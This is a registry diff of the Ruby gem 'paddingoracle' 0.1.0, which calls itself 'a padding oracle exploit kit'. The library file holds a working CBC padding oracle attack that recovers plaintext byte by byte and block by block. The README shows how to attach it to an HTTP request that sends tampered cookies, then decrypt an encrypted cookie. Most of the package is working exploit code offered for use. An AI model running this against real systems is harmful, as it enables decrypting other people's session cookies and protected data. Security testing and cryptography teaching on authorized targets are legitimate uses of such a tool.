paddingoracle 0.1.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA1:
3
+ metadata.gz: d93d43230839157731fe605c0b0b52425eeb2a97
4
+ data.tar.gz: 823903edb7fd3d3a99abf4c6710b4deb8b5194a8
5
+ SHA512:
6
+ metadata.gz: c750323b167537de65968c2a845c06ae5c8f5d44bcd78474e0333c744403a1072917a70cf172988d041acfa15d1ebda7fc319f485cae7c7a756f0dff95a040f4
7
+ data.tar.gz: 2d7558702fb218b31654ec64305402050d71c975c9d9634a45e63dcffc815ffdaa84bbeb06a2b27c91ae0e82ddcd1091ecc112588b356d3bdeb506acb20fb1d8
@@ -0,0 +1,9 @@
1
+ /.bundle/
2
+ /.yardoc
3
+ /Gemfile.lock
4
+ /_yardoc/
5
+ /coverage/
6
+ /doc/
7
+ /pkg/
8
+ /spec/reports/
9
+ /tmp/
@@ -0,0 +1,5 @@
1
+ sudo: false
2
+ language: ruby
3
+ rvm:
4
+ - 2.4.0
5
+ before_install: gem install bundler -v 1.13.7
data/Gemfile ADDED
@@ -0,0 +1,4 @@
1
+ source 'https://rubygems.org'
2
+
3
+ # Specify your gem's dependencies in paddingoracle.gemspec
4
+ gemspec
@@ -0,0 +1,21 @@
1
+ The MIT License (MIT)
2
+
3
+ Copyright (c) 2017 Technion
4
+
5
+ Permission is hereby granted, free of charge, to any person obtaining a copy
6
+ of this software and associated documentation files (the "Software"), to deal
7
+ in the Software without restriction, including without limitation the rights
8
+ to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9
+ copies of the Software, and to permit persons to whom the Software is
10
+ furnished to do so, subject to the following conditions:
11
+
12
+ The above copyright notice and this permission notice shall be included in
13
+ all copies or substantial portions of the Software.
14
+
15
+ THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16
+ IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17
+ FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18
+ AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19
+ LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20
+ OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
21
+ THE SOFTWARE.
@@ -0,0 +1,43 @@
1
+ # Paddingoracle
2
+
3
+ This is a Rubyframework for exploiting padding oracle vulnerabilities based on this fantastic Python project:
4
+
5
+ https://github.com/mwielgoszewski/python-paddingoracle
6
+
7
+ ## Usage
8
+
9
+
10
+ You will first need to extend the module with your own padding_oracle function. Example:
11
+
12
+ ```
13
+ require 'httparty'
14
+ require 'base64'
15
+ require 'uri'
16
+
17
+ URL = 'http://google.com'
18
+ module Paddingoracle
19
+ def decrypt_oracle(string)
20
+ string = URI.escape(Base64.strict_encode64(string))
21
+ response = HTTParty.get(URL, cookies: {auth: string})
22
+
23
+ raise "Invalid padding" if response.code != 200
24
+ end
25
+ end
26
+ ```
27
+
28
+ You can then run the attack like this;
29
+ ```
30
+ COOKIE = 'vulnerable encrypted data'
31
+ bcookie = Base64.decode64(COOKIE)
32
+ plain = Paddingoracle::recover_all_blocks(bcookie)
33
+ puts plain
34
+ ```
35
+
36
+ ## Contributing
37
+
38
+ This product was written to solve a specific problem - I'm happy to investigate bugs but this type of codebase is not suited to new features or "how to use" requests.
39
+
40
+ ## License
41
+
42
+ The gem is available as open source under the terms of the [MIT License](http://opensource.org/licenses/MIT).
43
+
@@ -0,0 +1,10 @@
1
+ require "bundler/gem_tasks"
2
+ require "rake/testtask"
3
+
4
+ Rake::TestTask.new(:test) do |t|
5
+ t.libs << "test"
6
+ t.libs << "lib"
7
+ t.test_files = FileList['test/**/*_test.rb']
8
+ end
9
+
10
+ task :default => :test
@@ -0,0 +1,14 @@
1
+ #!/usr/bin/env ruby
2
+
3
+ require "bundler/setup"
4
+ require "paddingoracle"
5
+
6
+ # You can add fixtures and/or initialization code here to make experimenting
7
+ # with your gem easier. You can also use a different console, if you like.
8
+
9
+ # (If you use this, don't forget to add pry to your Gemfile!)
10
+ # require "pry"
11
+ # Pry.start
12
+
13
+ require "irb"
14
+ IRB.start
@@ -0,0 +1,8 @@
1
+ #!/usr/bin/env bash
2
+ set -euo pipefail
3
+ IFS=$'\n\t'
4
+ set -vx
5
+
6
+ bundle install
7
+
8
+ # Do any other automated setup that you need to do here
@@ -0,0 +1,85 @@
1
+ require "paddingoracle/version"
2
+ require 'openssl'
3
+ require 'base64'
4
+ require 'uri'
5
+
6
+ module Paddingoracle
7
+ extend self
8
+ Blocksize = 8
9
+
10
+ def remove_pad(str)
11
+ # Remove PKCS #7 padding
12
+ raise "Incompatible remove_pad input" unless str.kind_of? String
13
+ last = str[-1,1]
14
+ raise "Invalid padding" unless last.ord > 0 && last.ord <= Blocksize
15
+
16
+ padstr = last.chr * last.ord
17
+
18
+ padstr = Regexp.escape(padstr)
19
+ unless /#{padstr}$/.match(str)
20
+ raise "Invalid padding"
21
+ end
22
+
23
+ return str[0..(str.length-last.ord)-1]
24
+ end
25
+
26
+ def recover_block(enc, prevblock)
27
+ #For a single CBC-encrypted block, utilise padding Oracle to
28
+ #recover plaintext
29
+ if enc.length != Blocksize || prevblock.length != Blocksize
30
+ raise "Incorrect block size to recover"
31
+ end
32
+ ret = ""
33
+ gen = ""
34
+ (0..Blocksize-1).to_a.reverse.each do |k| #For each byte in block
35
+ (0..256).each { |n|
36
+ if n == 256
37
+ #Should break before this point. n is only valid in 0-255
38
+ puts "Dumping #{ret}"
39
+ raise "Failed to find a value"
40
+ end
41
+ testblock = 'A' * k + n.chr + gen + enc
42
+ puts testblock.unpack('H*').join
43
+ if testblock.length != 2*Blocksize
44
+ raise "Test block had incorrect blocksize"
45
+ end
46
+ #puts "Lengths are #{testblock.length}"
47
+ begin
48
+ decrypt_oracle(testblock)
49
+ rescue NoMethodError
50
+ fail "Function decrypt_oracle function not written"
51
+ rescue StandardError
52
+ #The decrypt_oracle will raise this if the padding is invalid
53
+ next
54
+ end
55
+ b = (n.ord ^ (Blocksize-k).ord ^ prevblock[k].ord).ord
56
+ #Debugging
57
+ ret = b.chr + ret
58
+ break #No need to continue once identified
59
+ }
60
+ gen = ret.bytes.map.with_index{ |x, i|
61
+ ((Blocksize-k+1).ord ^ x.ord ^ prevblock[k+i].ord).chr}.join
62
+
63
+ end
64
+ return ret
65
+ end
66
+
67
+ def recover_all_blocks(enc)
68
+ #Cycle through each Blocksize block and gather results
69
+ #Strip PKCS#7 padding before returning
70
+ raise "Invalid block" unless enc.length % Blocksize == 0
71
+ ret = ""
72
+ prevblock = enc[0..Blocksize-1]
73
+ enc = enc[Blocksize..enc.length-1]
74
+ puts "we have #{enc.length} in length"
75
+ (0..enc.length-Blocksize).step(Blocksize) do |n|
76
+ block = enc[n..n+Blocksize-1]
77
+ ret += recover_block(block, prevblock)
78
+ prevblock = block
79
+ end
80
+ ret = remove_pad(ret)
81
+ return ret
82
+ end
83
+
84
+ end
85
+
@@ -0,0 +1,3 @@
1
+ module Paddingoracle
2
+ VERSION = "0.1.0"
3
+ end
@@ -0,0 +1,28 @@
1
+ # coding: utf-8
2
+ lib = File.expand_path('../lib', __FILE__)
3
+ $LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
4
+ require 'paddingoracle/version'
5
+
6
+ Gem::Specification.new do |spec|
7
+ spec.name = "paddingoracle"
8
+ spec.version = Paddingoracle::VERSION
9
+ spec.authors = ["Technion"]
10
+ spec.email = ["technion@lolware.net"]
11
+
12
+ spec.summary = %q{A padding oracle exploit kit.}
13
+ spec.description = %q{A framework for creating custom padding oracle exploits.}
14
+ spec.homepage = "https://github.com/technion/paddingoracle"
15
+ spec.license = "MIT"
16
+
17
+ spec.files = `git ls-files -z`.split("\x0").reject do |f|
18
+ f.match(%r{^(test|spec|features)/})
19
+ end
20
+ spec.bindir = "exe"
21
+ spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
22
+ spec.require_paths = ["lib"]
23
+
24
+ spec.add_development_dependency "bundler", "~> 1.13"
25
+ spec.add_development_dependency "rake", "~> 10.0"
26
+ spec.add_development_dependency "minitest", "~> 5.0"
27
+ spec.add_development_dependency "httparty"
28
+ end
metadata ADDED
@@ -0,0 +1,111 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: paddingoracle
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.1.0
5
+ platform: ruby
6
+ authors:
7
+ - Technion
8
+ autorequire:
9
+ bindir: exe
10
+ cert_chain: []
11
+ date: 2017-04-06 00:00:00.000000000 Z
12
+ dependencies:
13
+ - !ruby/object:Gem::Dependency
14
+ name: bundler
15
+ requirement: !ruby/object:Gem::Requirement
16
+ requirements:
17
+ - - "~>"
18
+ - !ruby/object:Gem::Version
19
+ version: '1.13'
20
+ type: :development
21
+ prerelease: false
22
+ version_requirements: !ruby/object:Gem::Requirement
23
+ requirements:
24
+ - - "~>"
25
+ - !ruby/object:Gem::Version
26
+ version: '1.13'
27
+ - !ruby/object:Gem::Dependency
28
+ name: rake
29
+ requirement: !ruby/object:Gem::Requirement
30
+ requirements:
31
+ - - "~>"
32
+ - !ruby/object:Gem::Version
33
+ version: '10.0'
34
+ type: :development
35
+ prerelease: false
36
+ version_requirements: !ruby/object:Gem::Requirement
37
+ requirements:
38
+ - - "~>"
39
+ - !ruby/object:Gem::Version
40
+ version: '10.0'
41
+ - !ruby/object:Gem::Dependency
42
+ name: minitest
43
+ requirement: !ruby/object:Gem::Requirement
44
+ requirements:
45
+ - - "~>"
46
+ - !ruby/object:Gem::Version
47
+ version: '5.0'
48
+ type: :development
49
+ prerelease: false
50
+ version_requirements: !ruby/object:Gem::Requirement
51
+ requirements:
52
+ - - "~>"
53
+ - !ruby/object:Gem::Version
54
+ version: '5.0'
55
+ - !ruby/object:Gem::Dependency
56
+ name: httparty
57
+ requirement: !ruby/object:Gem::Requirement
58
+ requirements:
59
+ - - ">="
60
+ - !ruby/object:Gem::Version
61
+ version: '0'
62
+ type: :development
63
+ prerelease: false
64
+ version_requirements: !ruby/object:Gem::Requirement
65
+ requirements:
66
+ - - ">="
67
+ - !ruby/object:Gem::Version
68
+ version: '0'
69
+ description: A framework for creating custom padding oracle exploits.
70
+ email:
71
+ - technion@lolware.net
72
+ executables: []
73
+ extensions: []
74
+ extra_rdoc_files: []
75
+ files:
76
+ - ".gitignore"
77
+ - ".travis.yml"
78
+ - Gemfile
79
+ - LICENSE.txt
80
+ - README.md
81
+ - Rakefile
82
+ - bin/console
83
+ - bin/setup
84
+ - lib/paddingoracle.rb
85
+ - lib/paddingoracle/version.rb
86
+ - paddingoracle.gemspec
87
+ homepage: https://github.com/technion/paddingoracle
88
+ licenses:
89
+ - MIT
90
+ metadata: {}
91
+ post_install_message:
92
+ rdoc_options: []
93
+ require_paths:
94
+ - lib
95
+ required_ruby_version: !ruby/object:Gem::Requirement
96
+ requirements:
97
+ - - ">="
98
+ - !ruby/object:Gem::Version
99
+ version: '0'
100
+ required_rubygems_version: !ruby/object:Gem::Requirement
101
+ requirements:
102
+ - - ">="
103
+ - !ruby/object:Gem::Version
104
+ version: '0'
105
+ requirements: []
106
+ rubyforge_project:
107
+ rubygems_version: 2.6.8
108
+ signing_key:
109
+ specification_version: 4
110
+ summary: A padding oracle exploit kit.
111
+ test_files: []